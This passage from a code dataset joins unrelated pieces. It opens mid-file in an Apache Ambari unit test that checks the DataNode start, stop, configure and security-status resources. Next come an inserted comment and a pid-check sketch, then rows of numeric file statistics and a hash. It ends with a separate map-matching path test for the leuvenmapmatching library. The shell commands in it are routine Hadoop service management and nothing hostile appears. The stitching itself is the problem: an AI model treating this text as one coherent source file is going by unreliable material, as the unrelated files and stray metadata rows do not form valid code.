self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_default(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
def test_configure_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "configure",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertNoMoreResources()
def test_start_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
def test_start_secured_HDP22_root(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
def test_start_secured_HDP22_non_root_https_only(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
secured_json['configurations']['hdfs-site']['dfs.http.policy']= 'HTTPS_ONLY'
secured_json['configurations']['hdfs-site']['dfs.datanode.address']= '0.0.0.0:10000'
secured_json['configurations']['hdfs-site']['dfs.datanode.https.address']= '0.0.0.0:50000'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "start",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assert_configure_secured()
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf start datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = 'ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_file = "secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/lib/hadoop/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/lib/hadoop/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured_HDP22_root(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', 'ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode',
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
)
self.assertNoMoreResources()
@patch("os.path.exists", new = MagicMock(return_value=False))
def test_stop_secured_HDP22_non_root_https_only(self):
config_file = self._getSrcFolder()+"/test/python/stacks/2.0.6/configs/secured.json"
with open(config_file, "r") as f:
secured_json = json.load(f)
secured_json['hostLevelParams']['stack_version']= '2.2'
secured_json['configurations']['hdfs-site']['dfs.http.policy']= 'HTTPS_ONLY'
secured_json['configurations']['hdfs-site']['dfs.datanode.address']= '0.0.0.0:10000'
secured_json['configurations']['hdfs-site']['dfs.datanode.https.address']= '0.0.0.0:50000'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "stop",
config_dict = secured_json,
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertResourceCalled('Directory', '/var/run/hadoop',
owner = 'hdfs',
group = 'hadoop',
mode = 0755
)
self.assertResourceCalled('Directory', '/var/run/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('Directory', '/var/log/hadoop/hdfs',
owner = 'hdfs',
recursive = True,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action = ['delete'],
not_if='ls /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid >/dev/null 2>&1 && ps -p `cat /var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid` >/dev/null 2>&1',
)
self.assertResourceCalled('Execute', "ambari-sudo.sh su hdfs -l -s /bin/bash -c '[RMF_EXPORT_PLACEHOLDER]ulimit -c unlimited ; /usr/hdp/current/hadoop-client/sbin/hadoop-daemon.sh --config /etc/hadoop/conf stop datanode'",
environment = {'HADOOP_LIBEXEC_DIR': '/usr/hdp/current/hadoop-client/libexec'},
not_if = None,
)
self.assertResourceCalled('File', '/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid',
action=['delete'],
)
self.assertNoMoreResources()
def assert_configure_default(self):
self.assertResourceCalled('Directory', '/etc/security/limits.d',
owner = 'root',
group = 'root',
recursive = True,
)
self.assertResourceCalled('File', '/etc/security/limits.d/hdfs.conf',
content = Template('hdfs.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['hdfs-site']
)
self.assertResourceCalled('XmlConfig', 'core-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['core-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['core-site'],
mode = 0644
)
self.assertResourceCalled('File', '/etc/hadoop/conf/slaves',
content = Template('slaves.j2'),
owner = 'hdfs',
)
self.assertResourceCalled('Directory', '/var/lib/hadoop-hdfs',
owner = 'hdfs',
group = 'hadoop',
mode = 0751,
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hdfs/data',
owner = 'hdfs',
ignore_failures = True,
group = 'hadoop',
mode = 0755,
recursive = True,
cd_access='a'
)
def assert_configure_secured(self):
self.assertResourceCalled('Directory', '/etc/security/limits.d',
owner = 'root',
group = 'root',
recursive = True,
)
self.assertResourceCalled('File', '/etc/security/limits.d/hdfs.conf',
content = Template('hdfs.conf.j2'),
owner = 'root',
group = 'root',
mode = 0644,
)
self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['hdfs-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['hdfs-site']
)
self.assertResourceCalled('XmlConfig', 'core-site.xml',
owner = 'hdfs',
group = 'hadoop',
conf_dir = '/etc/hadoop/conf',
configurations = self.getConfig()['configurations']['core-site'],
configuration_attributes = self.getConfig()['configuration_attributes']['core-site'],
mode = 0644
)
self.assertResourceCalled('File', '/etc/hadoop/conf/slaves',
content = Template('slaves.j2'),
owner = 'root',
)
self.assertResourceCalled('Directory', '/var/lib/hadoop-hdfs',
owner = 'hdfs',
group = 'hadoop',
mode = 0751,
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hdfs/data',
owner = 'hdfs',
ignore_failures = True,
group = 'hadoop',
mode = 0755,
recursive = True,
cd_access='a'
)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart(self, process_mock, time_mock):
process_output = """
Live datanodes (2):
Name: 192.168.64.102:50010 (c6401.ambari.apache.org)
Hostname: c6401.ambari.apache.org
Decommission Status : Normal
Configured Capacity: 524208947200 (488.21 GB)
DFS Used: 193069056 (184.13 MB)
Non DFS Used: 29264986112 (27.26 GB)
DFS Remaining: 494750892032 (460.77 GB)
DFS Used%: 0.04%
DFS Remaining%: 94.38%
Configured Cache Capacity: 0 (0 B)
Cache Used: 0 (0 B)
Cache Remaining: 0 (0 B)
Cache Used%: 100.00%
Cache Remaining%: 0.00%
Xceivers: 2
Last contact: Fri Dec 12 20:47:21 UTC 2014
"""
process_mock.return_value = (0, process_output)
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,1)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart_datanode_not_ready(self, process_mock, time_mock):
process_mock.return_value = (0, 'There are no DataNodes here!')
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.fail('Missing DataNode should have caused a failure')
except Fail as fail:
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,12)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart_bad_returncode(self, process_mock, time_mock):
process_mock.return_value = (0, 'some')
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.fail('Invalid return code should cause a failure')
except Fail as fail:
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,12)
@patch("resource_management.libraries.functions.security_commons.build_expectations")
@patch("resource_management.libraries.functions.security_commons.get_params_from_filesystem")
@patch("resource_management.libraries.functions.security_commons.validate_security_config_properties")
@patch("resource_management.libraries.functions.security_commons.cached_kinit_executor")
@patch("resource_management.libraries.script.Script.put_structured_out")
def test_security_status(self, put_structured_out_mock, cached_kinit_executor_mock, validate_security_config_mock, get_params_mock, build_exp_mock):
# Test that the function works when it is called with correct parameters
security_params = {
'core-site': {
'hadoop.security.authentication': 'kerberos'
},
'hdfs-site': {
'dfs.datanode.keytab.file': 'path/to/datanode/keytab/file',
'dfs.datanode.kerberos.principal': 'datanode_principal'
}
}
props_value_check = None
props_empty_check = ['dfs.datanode.keytab.file',
'dfs.datanode.kerberos.principal']
props_read_check = ['dfs.datanode.keytab.file']
result_issues = []
get_params_mock.return_value = security_params
validate_security_config_mock.return_value = result_issues
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
build_exp_mock.assert_called_with('hdfs-site', props_value_check, props_empty_check, props_read_check)
put_structured_out_mock.assert_called_with({"securityState": "SECURED_KERBEROS"})
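# NOTE: "called_with" (without the assert_ prefix) below is not a real Mock
# assertion; Mock auto-creates the attribute, so the call verifies nothing.
# The intended check is assert_called_with.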
cached_kinit_executor_mock.called_with('/usr/bin/kinit',
self.config_dict['configurations']['hadoop-env']['hdfs_user'],
security_params['hdfs-site']['dfs.datanode.keytab.file'],
security_params['hdfs-site']['dfs.datanode.kerberos.principal'],
self.config_dict['hostname'],
'/tmp')
# Testing when hadoop.security.authentication is simple
security_params['core-site']['hadoop.security.authentication'] = 'simple'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityState": "UNSECURED"})
security_params['core-site']['hadoop.security.authentication'] = 'kerberos'
# Testing that the exception thrown by cached_kinit_executor is caught
cached_kinit_executor_mock.reset_mock()
cached_kinit_executor_mock.side_effect = Exception("Invalid command")
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
except:
self.assertTrue(True)
# Testing with a security_params which doesn't contain hdfs-site
empty_security_params = {}
empty_security_params['core-site'] = {}
empty_security_params['core-site']['hadoop.security.authentication'] = 'kerberos'
cached_kinit_executor_mock.reset_mock()
get_params_mock.reset_mock()
put_structured_out_mock.reset_mock()
get_params_mock.return_value = empty_security_params
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityIssuesFound": "Keytab file or principal are not set property."})
# Testing with a non-empty result_issues
result_issues_with_params = {}
result_issues_with_params['hdfs-site']="Something bad happened"
validate_security_config_mock.reset_mock()
get_params_mock.reset_mock()
validate_security_config_mock.return_value = result_issues_with_params
get_params_mock.return_value = security_params
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityState": "UNSECURED"})
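A minimal standalone sketch of the pid-file liveness check that the recurring not_if guard in the tests above encodes (hypothetical helper, not part of the Ambari test suite):

import os
import subprocess

def datanode_is_running(pid_file='/var/run/hadoop/hdfs/hadoop-hdfs-datanode.pid'):
    # Python equivalent of the shell guard used throughout the tests:
    #   ls PIDFILE >/dev/null 2>&1 && ps -p `cat PIDFILE` >/dev/null 2>&1
    if not os.path.isfile(pid_file):
        return False
    with open(pid_file) as f:
        pid = f.read().strip()
    # ps -p exits non-zero when no process with that pid exists
    return subprocess.call(['ps', '-p', pid],
                           stdout=subprocess.DEVNULL,
                           stderr=subprocess.DEVNULL) == 0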
| 50.421304
| 228
| 0.546618
| 3,076
| 31,715
| 5.46619
| 0.112809
| 0.054716
| 0.037112
| 0.04187
| 0.856072
| 0.840371
| 0.8258
| 0.800642
| 0.777388
| 0.777388
| 0
| 0.015425
| 0.341794
| 31,715
| 628
| 229
| 50.501592
| 0.790036
| 0.009491
| 0
| 0.681159
| 0
| 0.036232
| 0.297504
| 0.121488
| 0
| 0
| 0
| 0
| 0.15942
| 0
| null | null | 0
| 0.009058
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
073ba2ef8cf2a8fcaad593e62fb105e2b40fe759
| 17,163
|
py
|
Python
|
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# encoding: utf-8
"""
tests.test_path
~~~~~~~~~~~~~~~
:author: Wannes Meert
:copyright: Copyright 2017-2018 DTAI, KU Leuven and Sirris.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
import sys
import os
import logging
from pathlib import Path
sys.path.append("..")
import leuvenmapmatching as mm
from leuvenmapmatching.map.inmem import InMemMap
from leuvenmapmatching.matcher.simple import SimpleMatcher
from leuvenmapmatching.matcher.distance import DistanceMatcher
logger = mm.logger
directory = None
def test_path1():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C"]),
"B": ((1, 3), ["A", "C", "D"]),
"C": ((2, 2), ["A", "B", "D", "E"]),
"D": ((2, 4), ["B", "C", "D", "E"]),
"E": ((3, 3), ["C", "D", "F"]),
"F": ((3, 5), ["D", "E"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=None,
non_emitting_states=False, only_edges=False)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_graph=True, show_lattice=True,
filename=str(directory / "test_path1.png"))
# assert path_pred == path_sol, f"Paths not equal:\n{path_pred}\n{path_sol}"
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path1_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C"]),
"B": ((1, 3), ["A", "C", "D"]),
"C": ((2, 2), ["A", "B", "D", "E"]),
"D": ((2, 4), ["B", "C", "D", "E"]),
"E": ((3, 3), ["C", "D", "F"]),
"F": ((3, 5), ["D", "E"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=None,
obs_noise=0.5,
non_emitting_states=False)
matcher.match(path)
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path1_dist.png"))
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
non_emitting_states=False, only_edges=False,
max_lattice_width=3)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / "test_path2.png"))
# assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2_inc():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
## Phase 1
print('=== PHASE 1 ===')
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
non_emitting_states=False, only_edges=False,
max_lattice_width=1)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'test_path2_inc_1.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile, precision=2, render=True)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / "test_path2_inc_1.png"))
## Next phases
for phase_nb, phase_width in enumerate([2, 3]):
print(f'=== PHASE {phase_nb + 2} ===')
path_pred, _ = matcher.increase_max_lattice_width(phase_width, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / f'test_path2_inc_{phase_nb + 2}.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile, precision=2, render=True)
